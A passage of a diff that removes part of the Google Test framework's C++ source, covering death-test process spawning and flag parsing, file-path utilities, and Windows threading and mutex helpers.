-    GTEST_DEATH_TEST_CHECK_(munmap(stack, stack_size) != -1);
-  }
-#   else
-  const bool use_fork = true;
-#   endif  // GTEST_HAS_CLONE
-
-  if (use_fork && (child_pid = fork()) == 0) {
-      ExecDeathTestChildMain(&args);
-      _exit(0);
-  }
-#  endif  // GTEST_OS_QNX
-#  if GTEST_OS_LINUX
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(
-      sigaction(SIGPROF, &saved_sigprof_action, NULL));
-#  endif  // GTEST_OS_LINUX
-
-  GTEST_DEATH_TEST_CHECK_(child_pid != -1);
-  return child_pid;
-}
-
-// The AssumeRole process for a fork-and-exec death test.  It re-executes the
-// main program from the beginning, setting the --gtest_filter
-// and --gtest_internal_run_death_test flags to cause only the current
-// death test to be re-run.
-DeathTest::TestRole ExecDeathTest::AssumeRole() {
-  const UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const TestInfo* const info = impl->current_test_info();
-  const int death_test_index = info->result()->death_test_count();
-
-  if (flag != NULL) {
-    set_write_fd(flag->write_fd());
-    return EXECUTE_TEST;
-  }
-
-  int pipe_fd[2];
-  GTEST_DEATH_TEST_CHECK_(pipe(pipe_fd) != -1);
-  // Clear the close-on-exec flag on the write end of the pipe, lest
-  // it be closed when the child process does an exec:
-  GTEST_DEATH_TEST_CHECK_(fcntl(pipe_fd[1], F_SETFD, 0) != -1);
-
-  const std::string filter_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kFilterFlag + "="
-      + info->test_case_name() + "." + info->name();
-  const std::string internal_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kInternalRunDeathTestFlag + "="
-      + file_ + "|" + StreamableToString(line_) + "|"
-      + StreamableToString(death_test_index) + "|"
-      + StreamableToString(pipe_fd[1]);
-  Arguments args;
-  args.AddArguments(GetArgvsForDeathTestChildProcess());
-  args.AddArgument(filter_flag.c_str());
-  args.AddArgument(internal_flag.c_str());
-
-  DeathTest::set_last_death_test_message("");
-
-  CaptureStderr();
-  // See the comment in NoExecDeathTest::AssumeRole for why the next line
-  // is necessary.
-  FlushInfoLog();
-
-  const pid_t child_pid = ExecDeathTestSpawnChild(args.Argv(), pipe_fd[0]);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[1]));
-  set_child_pid(child_pid);
-  set_read_fd(pipe_fd[0]);
-  set_spawned(true);
-  return OVERSEE_TEST;
-}
-
-# endif  // !GTEST_OS_WINDOWS
-
-// Creates a concrete DeathTest-derived class that depends on the
-// --gtest_death_test_style flag, and sets the pointer pointed to
-// by the "test" argument to its address.  If the test should be
-// skipped, sets that pointer to NULL.  Returns true, unless the
-// flag is set to an invalid value.
-bool DefaultDeathTestFactory::Create(const char* statement, const RE* regex,
-                                     const char* file, int line,
-                                     DeathTest** test) {
-  UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const int death_test_index = impl->current_test_info()
-      ->increment_death_test_count();
-
-  if (flag != NULL) {
-    if (death_test_index > flag->index()) {
-      DeathTest::set_last_death_test_message(
-          "Death test count (" + StreamableToString(death_test_index)
-          + ") somehow exceeded expected maximum ("
-          + StreamableToString(flag->index()) + ")");
-      return false;
-    }
-
-    if (!(flag->file() == file && flag->line() == line &&
-          flag->index() == death_test_index)) {
-      *test = NULL;
-      return true;
-    }
-  }
-
-# if GTEST_OS_WINDOWS
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe" ||
-      GTEST_FLAG(death_test_style) == "fast") {
-    *test = new WindowsDeathTest(statement, regex, file, line);
-  }
-
-# else
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe") {
-    *test = new ExecDeathTest(statement, regex, file, line);
-  } else if (GTEST_FLAG(death_test_style) == "fast") {
-    *test = new NoExecDeathTest(statement, regex);
-  }
-
-# endif  // GTEST_OS_WINDOWS
-
-  else {  // NOLINT - this is more readable than unbalanced brackets inside #if.
-    DeathTest::set_last_death_test_message(
-        "Unknown death test style \"" + GTEST_FLAG(death_test_style)
-        + "\" encountered");
-    return false;
-  }
-
-  return true;
-}
-
-// Splits a given string on a given delimiter, populating a given
-// vector with the fields.  GTEST_HAS_DEATH_TEST implies that we have
-// ::std::string, so we can use it here.
-static void SplitString(const ::std::string& str, char delimiter,
-                        ::std::vector< ::std::string>* dest) {
-  ::std::vector< ::std::string> parsed;
-  ::std::string::size_type pos = 0;
-  while (::testing::internal::AlwaysTrue()) {
-    const ::std::string::size_type colon = str.find(delimiter, pos);
-    if (colon == ::std::string::npos) {
-      parsed.push_back(str.substr(pos));
-      break;
-    } else {
-      parsed.push_back(str.substr(pos, colon - pos));
-      pos = colon + 1;
-    }
-  }
-  dest->swap(parsed);
-}
-
-# if GTEST_OS_WINDOWS
-// Recreates the pipe and event handles from the provided parameters,
-// signals the event, and returns a file descriptor wrapped around the pipe
-// handle. This function is called in the child process only.
-int GetStatusFileDescriptor(unsigned int parent_process_id,
-                            size_t write_handle_as_size_t,
-                            size_t event_handle_as_size_t) {
-  AutoHandle parent_process_handle(::OpenProcess(PROCESS_DUP_HANDLE,
-                                                   FALSE,  // Non-inheritable.
-                                                   parent_process_id));
-  if (parent_process_handle.Get() == INVALID_HANDLE_VALUE) {
-    DeathTestAbort("Unable to open parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  // TODO(vladl@google.com): Replace the following check with a
-  // compile-time assertion when available.
-  GTEST_CHECK_(sizeof(HANDLE) <= sizeof(size_t));
-
-  const HANDLE write_handle =
-      reinterpret_cast<HANDLE>(write_handle_as_size_t);
-  HANDLE dup_write_handle;
-
-  // The newly initialized handle is accessible only in in the parent
-  // process. To obtain one accessible within the child, we need to use
-  // DuplicateHandle.
-  if (!::DuplicateHandle(parent_process_handle.Get(), write_handle,
-                         ::GetCurrentProcess(), &dup_write_handle,
-                         0x0,    // Requested privileges ignored since
-                                 // DUPLICATE_SAME_ACCESS is used.
-                         FALSE,  // Request non-inheritable handler.
-                         DUPLICATE_SAME_ACCESS)) {
-    DeathTestAbort("Unable to duplicate the pipe handle " +
-                   StreamableToString(write_handle_as_size_t) +
-                   " from the parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  const HANDLE event_handle = reinterpret_cast<HANDLE>(event_handle_as_size_t);
-  HANDLE dup_event_handle;
-
-  if (!::DuplicateHandle(parent_process_handle.Get(), event_handle,
-                         ::GetCurrentProcess(), &dup_event_handle,
-                         0x0,
-                         FALSE,
-                         DUPLICATE_SAME_ACCESS)) {
-    DeathTestAbort("Unable to duplicate the event handle " +
-                   StreamableToString(event_handle_as_size_t) +
-                   " from the parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  const int write_fd =
-      ::_open_osfhandle(reinterpret_cast<intptr_t>(dup_write_handle), O_APPEND);
-  if (write_fd == -1) {
-    DeathTestAbort("Unable to convert pipe handle " +
-                   StreamableToString(write_handle_as_size_t) +
-                   " to a file descriptor");
-  }
-
-  // Signals the parent that the write end of the pipe has been acquired
-  // so the parent can release its own write end.
-  ::SetEvent(dup_event_handle);
-
-  return write_fd;
-}
-# endif  // GTEST_OS_WINDOWS
-
-// Returns a newly created InternalRunDeathTestFlag object with fields
-// initialized from the GTEST_FLAG(internal_run_death_test) flag if
-// the flag is specified; otherwise returns NULL.
-InternalRunDeathTestFlag* ParseInternalRunDeathTestFlag() {
-  if (GTEST_FLAG(internal_run_death_test) == "") return NULL;
-
-  // GTEST_HAS_DEATH_TEST implies that we have ::std::string, so we
-  // can use it here.
-  int line = -1;
-  int index = -1;
-  ::std::vector< ::std::string> fields;
-  SplitString(GTEST_FLAG(internal_run_death_test).c_str(), '|', &fields);
-  int write_fd = -1;
-
-# if GTEST_OS_WINDOWS
-
-  unsigned int parent_process_id = 0;
-  size_t write_handle_as_size_t = 0;
-  size_t event_handle_as_size_t = 0;
-
-  if (fields.size() != 6
-      || !ParseNaturalNumber(fields[1], &line)
-      || !ParseNaturalNumber(fields[2], &index)
-      || !ParseNaturalNumber(fields[3], &parent_process_id)
-      || !ParseNaturalNumber(fields[4], &write_handle_as_size_t)
-      || !ParseNaturalNumber(fields[5], &event_handle_as_size_t)) {
-    DeathTestAbort("Bad --gtest_internal_run_death_test flag: " +
-                   GTEST_FLAG(internal_run_death_test));
-  }
-  write_fd = GetStatusFileDescriptor(parent_process_id,
-                                     write_handle_as_size_t,
-                                     event_handle_as_size_t);
-# else
-
-  if (fields.size() != 4
-      || !ParseNaturalNumber(fields[1], &line)
-      || !ParseNaturalNumber(fields[2], &index)
-      || !ParseNaturalNumber(fields[3], &write_fd)) {
-    DeathTestAbort("Bad --gtest_internal_run_death_test flag: "
-        + GTEST_FLAG(internal_run_death_test));
-  }
-
-# endif  // GTEST_OS_WINDOWS
-
-  return new InternalRunDeathTestFlag(fields[0], line, index, write_fd);
-}
-
-}  // namespace internal
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: keith.ray@gmail.com (Keith Ray)
-
-
-#include <stdlib.h>
-
-#if GTEST_OS_WINDOWS_MOBILE
-# include <windows.h>
-#elif GTEST_OS_WINDOWS
-# include <direct.h>
-# include <io.h>
-#elif GTEST_OS_SYMBIAN
-// Symbian OpenC has PATH_MAX in sys/syslimits.h
-# include <sys/syslimits.h>
-#else
-# include <limits.h>
-# include <climits>  // Some Linux distributions define PATH_MAX here.
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-#if GTEST_OS_WINDOWS
-# define GTEST_PATH_MAX_ _MAX_PATH
-#elif defined(PATH_MAX)
-# define GTEST_PATH_MAX_ PATH_MAX
-#elif defined(_XOPEN_PATH_MAX)
-# define GTEST_PATH_MAX_ _XOPEN_PATH_MAX
-#else
-# define GTEST_PATH_MAX_ _POSIX_PATH_MAX
-#endif  // GTEST_OS_WINDOWS
-
-
-namespace testing {
-namespace internal {
-
-#if GTEST_OS_WINDOWS
-// On Windows, '\\' is the standard path separator, but many tools and the
-// Windows API also accept '/' as an alternate path separator. Unless otherwise
-// noted, a file path can contain either kind of path separators, or a mixture
-// of them.
-const char kPathSeparator = '\\';
-const char kAlternatePathSeparator = '/';
-const char kAlternatePathSeparatorString[] = "/";
-# if GTEST_OS_WINDOWS_MOBILE
-// Windows CE doesn't have a current directory. You should not use
-// the current directory in tests on Windows CE, but this at least
-// provides a reasonable fallback.
-const char kCurrentDirectoryString[] = "\\";
-// Windows CE doesn't define INVALID_FILE_ATTRIBUTES
-const DWORD kInvalidFileAttributes = 0xffffffff;
-# else
-const char kCurrentDirectoryString[] = ".\\";
-# endif  // GTEST_OS_WINDOWS_MOBILE
-#else
-const char kPathSeparator = '/';
-const char kCurrentDirectoryString[] = "./";
-#endif  // GTEST_OS_WINDOWS
-
-// Returns whether the given character is a valid path separator.
-static bool IsPathSeparator(char c) {
-#if GTEST_HAS_ALT_PATH_SEP_
-  return (c == kPathSeparator) || (c == kAlternatePathSeparator);
-#else
-  return c == kPathSeparator;
-#endif
-}
-
-// Returns the current working directory, or "" if unsuccessful.
-FilePath FilePath::GetCurrentDir() {
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-  // Windows CE doesn't have a current directory, so we just return
-  // something reasonable.
-  return FilePath(kCurrentDirectoryString);
-#elif GTEST_OS_WINDOWS
-  char cwd[GTEST_PATH_MAX_ + 1] = { '\0' };
-  return FilePath(_getcwd(cwd, sizeof(cwd)) == NULL ? "" : cwd);
-#else
-  char cwd[GTEST_PATH_MAX_ + 1] = { '\0' };
-  char* result = getcwd(cwd, sizeof(cwd));
-# if GTEST_OS_NACL
-  // getcwd will likely fail in NaCl due to the sandbox, so return something
-  // reasonable. The user may have provided a shim implementation for getcwd,
-  // however, so fallback only when failure is detected.
-  return FilePath(result == NULL ? kCurrentDirectoryString : cwd);
-# endif  // GTEST_OS_NACL
-  return FilePath(result == NULL ? "" : cwd);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-}
-
-// Returns a copy of the FilePath with the case-insensitive extension removed.
-// Example: FilePath("dir/file.exe").RemoveExtension("EXE") returns
-// FilePath("dir/file"). If a case-insensitive extension is not
-// found, returns a copy of the original FilePath.
-FilePath FilePath::RemoveExtension(const char* extension) const {
-  const std::string dot_extension = std::string(".") + extension;
-  if (String::EndsWithCaseInsensitive(pathname_, dot_extension)) {
-    return FilePath(pathname_.substr(
-        0, pathname_.length() - dot_extension.length()));
-  }
-  return *this;
-}
-
-// Returns a pointer to the last occurrence of a valid path separator in
-// the FilePath. On Windows, for example, both '/' and '\' are valid path
-// separators. Returns NULL if no path separator was found.
-const char* FilePath::FindLastPathSeparator() const {
-  const char* const last_sep = strrchr(c_str(), kPathSeparator);
-#if GTEST_HAS_ALT_PATH_SEP_
-  const char* const last_alt_sep = strrchr(c_str(), kAlternatePathSeparator);
-  // Comparing two pointers of which only one is NULL is undefined.
-  if (last_alt_sep != NULL &&
-      (last_sep == NULL || last_alt_sep > last_sep)) {
-    return last_alt_sep;
-  }
-#endif
-  return last_sep;
-}
-
-// Returns a copy of the FilePath with the directory part removed.
-// Example: FilePath("path/to/file").RemoveDirectoryName() returns
-// FilePath("file"). If there is no directory part ("just_a_file"), it returns
-// the FilePath unmodified. If there is no file part ("just_a_dir/") it
-// returns an empty FilePath ("").
-// On Windows platform, '\' is the path separator, otherwise it is '/'.
-FilePath FilePath::RemoveDirectoryName() const {
-  const char* const last_sep = FindLastPathSeparator();
-  return last_sep ? FilePath(last_sep + 1) : *this;
-}
-
-// RemoveFileName returns the directory path with the filename removed.
-// Example: FilePath("path/to/file").RemoveFileName() returns "path/to/".
-// If the FilePath is "a_file" or "/a_file", RemoveFileName returns
-// FilePath("./") or, on Windows, FilePath(".\\"). If the filepath does
-// not have a file, like "just/a/dir/", it returns the FilePath unmodified.
-// On Windows platform, '\' is the path separator, otherwise it is '/'.
-FilePath FilePath::RemoveFileName() const {
-  const char* const last_sep = FindLastPathSeparator();
-  std::string dir;
-  if (last_sep) {
-    dir = std::string(c_str(), last_sep + 1 - c_str());
-  } else {
-    dir = kCurrentDirectoryString;
-  }
-  return FilePath(dir);
-}
-
-// Helper functions for naming files in a directory for xml output.
-
-// Given directory = "dir", base_name = "test", number = 0,
-// extension = "xml", returns "dir/test.xml". If number is greater
-// than zero (e.g., 12), returns "dir/test_12.xml".
-// On Windows platform, uses \ as the separator rather than /.
-FilePath FilePath::MakeFileName(const FilePath& directory,
-                                const FilePath& base_name,
-                                int number,
-                                const char* extension) {
-  std::string file;
-  if (number == 0) {
-    file = base_name.string() + "." + extension;
-  } else {
-    file = base_name.string() + "_" + StreamableToString(number)
-        + "." + extension;
-  }
-  return ConcatPaths(directory, FilePath(file));
-}
-
-// Given directory = "dir", relative_path = "test.xml", returns "dir/test.xml".
-// On Windows, uses \ as the separator rather than /.
-FilePath FilePath::ConcatPaths(const FilePath& directory,
-                               const FilePath& relative_path) {
-  if (directory.IsEmpty())
-    return relative_path;
-  const FilePath dir(directory.RemoveTrailingPathSeparator());
-  return FilePath(dir.string() + kPathSeparator + relative_path.string());
-}
-
-// Returns true if pathname describes something findable in the file-system,
-// either a file, directory, or whatever.
-bool FilePath::FileOrDirectoryExists() const {
-#if GTEST_OS_WINDOWS_MOBILE
-  LPCWSTR unicode = String::AnsiToUtf16(pathname_.c_str());
-  const DWORD attributes = GetFileAttributes(unicode);
-  delete [] unicode;
-  return attributes != kInvalidFileAttributes;
-#else
-  posix::StatStruct file_stat;
-  return posix::Stat(pathname_.c_str(), &file_stat) == 0;
-#endif  // GTEST_OS_WINDOWS_MOBILE
-}
-
-// Returns true if pathname describes a directory in the file-system
-// that exists.
-bool FilePath::DirectoryExists() const {
-  bool result = false;
-#if GTEST_OS_WINDOWS
-  // Don't strip off trailing separator if path is a root directory on
-  // Windows (like "C:\\").
-  const FilePath& path(IsRootDirectory() ? *this :
-                                           RemoveTrailingPathSeparator());
-#else
-  const FilePath& path(*this);
-#endif
-
-#if GTEST_OS_WINDOWS_MOBILE
-  LPCWSTR unicode = String::AnsiToUtf16(path.c_str());
-  const DWORD attributes = GetFileAttributes(unicode);
-  delete [] unicode;
-  if ((attributes != kInvalidFileAttributes) &&
-      (attributes & FILE_ATTRIBUTE_DIRECTORY)) {
-    result = true;
-  }
-#else
-  posix::StatStruct file_stat;
-  result = posix::Stat(path.c_str(), &file_stat) == 0 &&
-      posix::IsDir(file_stat);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-  return result;
-}
-
-// Returns true if pathname describes a root directory. (Windows has one
-// root directory per disk drive.)
-bool FilePath::IsRootDirectory() const {
-#if GTEST_OS_WINDOWS
-  // TODO(wan@google.com): on Windows a network share like
-  // \\server\share can be a root directory, although it cannot be the
-  // current directory.  Handle this properly.
-  return pathname_.length() == 3 && IsAbsolutePath();
-#else
-  return pathname_.length() == 1 && IsPathSeparator(pathname_.c_str()[0]);
-#endif
-}
-
-// Returns true if pathname describes an absolute path.
-bool FilePath::IsAbsolutePath() const {
-  const char* const name = pathname_.c_str();
-#if GTEST_OS_WINDOWS
-  return pathname_.length() >= 3 &&
-     ((name[0] >= 'a' && name[0] <= 'z') ||
-      (name[0] >= 'A' && name[0] <= 'Z')) &&
-     name[1] == ':' &&
-     IsPathSeparator(name[2]);
-#else
-  return IsPathSeparator(name[0]);
-#endif
-}
-
-// Returns a pathname for a file that does not currently exist. The pathname
-// will be directory/base_name.extension or
-// directory/base_name_<number>.extension if directory/base_name.extension
-// already exists. The number will be incremented until a pathname is found
-// that does not already exist.
-// Examples: 'dir/foo_test.xml' or 'dir/foo_test_1.xml'.
-// There could be a race condition if two or more processes are calling this
-// function at the same time -- they could both pick the same filename.
-FilePath FilePath::GenerateUniqueFileName(const FilePath& directory,
-                                          const FilePath& base_name,
-                                          const char* extension) {
-  FilePath full_pathname;
-  int number = 0;
-  do {
-    full_pathname.Set(MakeFileName(directory, base_name, number++, extension));
-  } while (full_pathname.FileOrDirectoryExists());
-  return full_pathname;
-}
-
-// Returns true if FilePath ends with a path separator, which indicates that
-// it is intended to represent a directory. Returns false otherwise.
-// This does NOT check that a directory (or file) actually exists.
-bool FilePath::IsDirectory() const {
-  return !pathname_.empty() &&
-         IsPathSeparator(pathname_.c_str()[pathname_.length() - 1]);
-}
-
-// Create directories so that path exists. Returns true if successful or if
-// the directories already exist; returns false if unable to create directories
-// for any reason.
-bool FilePath::CreateDirectoriesRecursively() const {
-  if (!this->IsDirectory()) {
-    return false;
-  }
-
-  if (pathname_.length() == 0 || this->DirectoryExists()) {
-    return true;
-  }
-
-  const FilePath parent(this->RemoveTrailingPathSeparator().RemoveFileName());
-  return parent.CreateDirectoriesRecursively() && this->CreateFolder();
-}
-
-// Create the directory so that path exists. Returns true if successful or
-// if the directory already exists; returns false if unable to create the
-// directory for any reason, including if the parent directory does not
-// exist. Not named "CreateDirectory" because that's a macro on Windows.
-bool FilePath::CreateFolder() const {
-#if GTEST_OS_WINDOWS_MOBILE
-  FilePath removed_sep(this->RemoveTrailingPathSeparator());
-  LPCWSTR unicode = String::AnsiToUtf16(removed_sep.c_str());
-  int result = CreateDirectory(unicode, NULL) ? 0 : -1;
-  delete [] unicode;
-#elif GTEST_OS_WINDOWS
-  int result = _mkdir(pathname_.c_str());
-#else
-  int result = mkdir(pathname_.c_str(), 0777);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-  if (result == -1) {
-    return this->DirectoryExists();  // An error is OK if the directory exists.
-  }
-  return true;  // No error.
-}
-
-// If input name has a trailing separator character, remove it and return the
-// name, otherwise return the name string unmodified.
-// On Windows platform, uses \ as the separator, other platforms use /.
-FilePath FilePath::RemoveTrailingPathSeparator() const {
-  return IsDirectory()
-      ? FilePath(pathname_.substr(0, pathname_.length() - 1))
-      : *this;
-}
-
-// Removes any redundant separators that might be in the pathname.
-// For example, "bar///foo" becomes "bar/foo". Does not eliminate other
-// redundancies that might be in a pathname involving "." or "..".
-// TODO(wan@google.com): handle Windows network shares (e.g. \\server\share).
-void FilePath::Normalize() {
-  if (pathname_.c_str() == NULL) {
-    pathname_ = "";
-    return;
-  }
-  const char* src = pathname_.c_str();
-  char* const dest = new char[pathname_.length() + 1];
-  char* dest_ptr = dest;
-  memset(dest_ptr, 0, pathname_.length() + 1);
-
-  while (*src != '\0') {
-    *dest_ptr = *src;
-    if (!IsPathSeparator(*src)) {
-      src++;
-    } else {
-#if GTEST_HAS_ALT_PATH_SEP_
-      if (*dest_ptr == kAlternatePathSeparator) {
-        *dest_ptr = kPathSeparator;
-      }
-#endif
-      while (IsPathSeparator(*src))
-        src++;
-    }
-    dest_ptr++;
-  }
-  *dest_ptr = '\0';
-  pathname_ = dest;
-  delete[] dest;
-}
-
-}  // namespace internal
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-
-#include <limits.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#if GTEST_OS_WINDOWS
-# include <windows.h>
-# include <io.h>
-# include <sys/stat.h>
-# include <map>  // Used in ThreadLocal.
-#else
-# include <unistd.h>
-#endif  // GTEST_OS_WINDOWS
-
-#if GTEST_OS_MAC
-# include <mach/mach_init.h>
-# include <mach/task.h>
-# include <mach/vm_map.h>
-#endif  // GTEST_OS_MAC
-
-#if GTEST_OS_QNX
-# include <devctl.h>
-# include <fcntl.h>
-# include <sys/procfs.h>
-#endif  // GTEST_OS_QNX
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-namespace internal {
-
-#if defined(_MSC_VER) || defined(__BORLANDC__)
-// MSVC and C++Builder do not provide a definition of STDERR_FILENO.
-const int kStdOutFileno = 1;
-const int kStdErrFileno = 2;
-#else
-const int kStdOutFileno = STDOUT_FILENO;
-const int kStdErrFileno = STDERR_FILENO;
-#endif  // _MSC_VER
-
-#if GTEST_OS_MAC
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-size_t GetThreadCount() {
-  const task_t task = mach_task_self();
-  mach_msg_type_number_t thread_count;
-  thread_act_array_t thread_list;
-  const kern_return_t status = task_threads(task, &thread_list, &thread_count);
-  if (status == KERN_SUCCESS) {
-    // task_threads allocates resources in thread_list and we need to free them
-    // to avoid leaks.
-    vm_deallocate(task,
-                  reinterpret_cast<vm_address_t>(thread_list),
-                  sizeof(thread_t) * thread_count);
-    return static_cast<size_t>(thread_count);
-  } else {
-    return 0;
-  }
-}
-
-#elif GTEST_OS_QNX
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-size_t GetThreadCount() {
-  const int fd = open("/proc/self/as", O_RDONLY);
-  if (fd < 0) {
-    return 0;
-  }
-  procfs_info process_info;
-  const int status =
-      devctl(fd, DCMD_PROC_INFO, &process_info, sizeof(process_info), NULL);
-  close(fd);
-  if (status == EOK) {
-    return static_cast<size_t>(process_info.num_threads);
-  } else {
-    return 0;
-  }
-}
-
-#else
-
-size_t GetThreadCount() {
-  // There's no portable way to detect the number of threads, so we just
-  // return 0 to indicate that we cannot detect it.
-  return 0;
-}
-
-#endif  // GTEST_OS_MAC
-
-#if GTEST_IS_THREADSAFE && GTEST_OS_WINDOWS
-
-void SleepMilliseconds(int n) {
-  ::Sleep(n);
-}
-
-AutoHandle::AutoHandle()
-    : handle_(INVALID_HANDLE_VALUE) {}
-
-AutoHandle::AutoHandle(Handle handle)
-    : handle_(handle) {}
-
-AutoHandle::~AutoHandle() {
-  Reset();
-}
-
-AutoHandle::Handle AutoHandle::Get() const {
-  return handle_;
-}
-
-void AutoHandle::Reset() {
-  Reset(INVALID_HANDLE_VALUE);
-}
-
-void AutoHandle::Reset(HANDLE handle) {
-  // Resetting with the same handle we already own is invalid.
-  if (handle_ != handle) {
-    if (IsCloseable()) {
-      ::CloseHandle(handle_);
-    }
-    handle_ = handle;
-  } else {
-    GTEST_CHECK_(!IsCloseable())
-        << "Resetting a valid handle to itself is likely a programmer error "
-            "and thus not allowed.";
-  }
-}
-
-bool AutoHandle::IsCloseable() const {
-  // Different Windows APIs may use either of these values to represent an
-  // invalid handle.
-  return handle_ != NULL && handle_ != INVALID_HANDLE_VALUE;
-}
-
-Notification::Notification()
-    : event_(::CreateEvent(NULL,   // Default security attributes.
-                           TRUE,   // Do not reset automatically.
-                           FALSE,  // Initially unset.
-                           NULL)) {  // Anonymous event.
-  GTEST_CHECK_(event_.Get() != NULL);
-}
-
-void Notification::Notify() {
-  GTEST_CHECK_(::SetEvent(event_.Get()) != FALSE);
-}
-
-void Notification::WaitForNotification() {
-  GTEST_CHECK_(
-      ::WaitForSingleObject(event_.Get(), INFINITE) == WAIT_OBJECT_0);
-}
-
-Mutex::Mutex()
-    : owner_thread_id_(0),
-      type_(kDynamic),
-      critical_section_init_phase_(0),
-      critical_section_(new CRITICAL_SECTION) {
-  ::InitializeCriticalSection(critical_section_);
-}
-
-Mutex::~Mutex() {
-  // Static mutexes are leaked intentionally. It is not thread-safe to try
-  // to clean them up.
-  // TODO(yukawa): Switch to Slim Reader/Writer (SRW) Locks, which requires
-  // nothing to clean it up but is available only on Vista and later.
-  // http://msdn.microsoft.com/en-us/library/windows/desktop/aa904937.aspx
-  if (type_ == kDynamic) {
-    ::DeleteCriticalSection(critical_section_);
-    delete critical_section_;
-    critical_section_ = NULL;
-  }
-}
-
-void Mutex::Lock() {
-  ThreadSafeLazyInit();
-  ::EnterCriticalSection(critical_section_);
-  owner_thread_id_ = ::GetCurrentThreadId();
-}
-
-void Mutex::Unlock() {
-  ThreadSafeLazyInit();
-  // We don't protect writing to owner_thread_id_ here, as it's the
-  // caller's responsibility to ensure that the current thread holds the
-  // mutex when this is called.
-  owner_thread_id_ = 0;
-  ::LeaveCriticalSection(critical_section_);
-}
-
-// Does nothing if the current thread holds the mutex. Otherwise, crashes
-// with high probability.
-void Mutex::AssertHeld() {
-  ThreadSafeLazyInit();
-  GTEST_CHECK_(owner_thread_id_ == ::GetCurrentThreadId())
-      << "The current thread is not holding the mutex @" << this;
-}
-
-// Initializes owner_thread_id_ and critical_section_ in static mutexes.
-void Mutex::ThreadSafeLazyInit() {
-  // Dynamic mutexes are initialized in the constructor.
-  if (type_ == kStatic) {
-    switch (
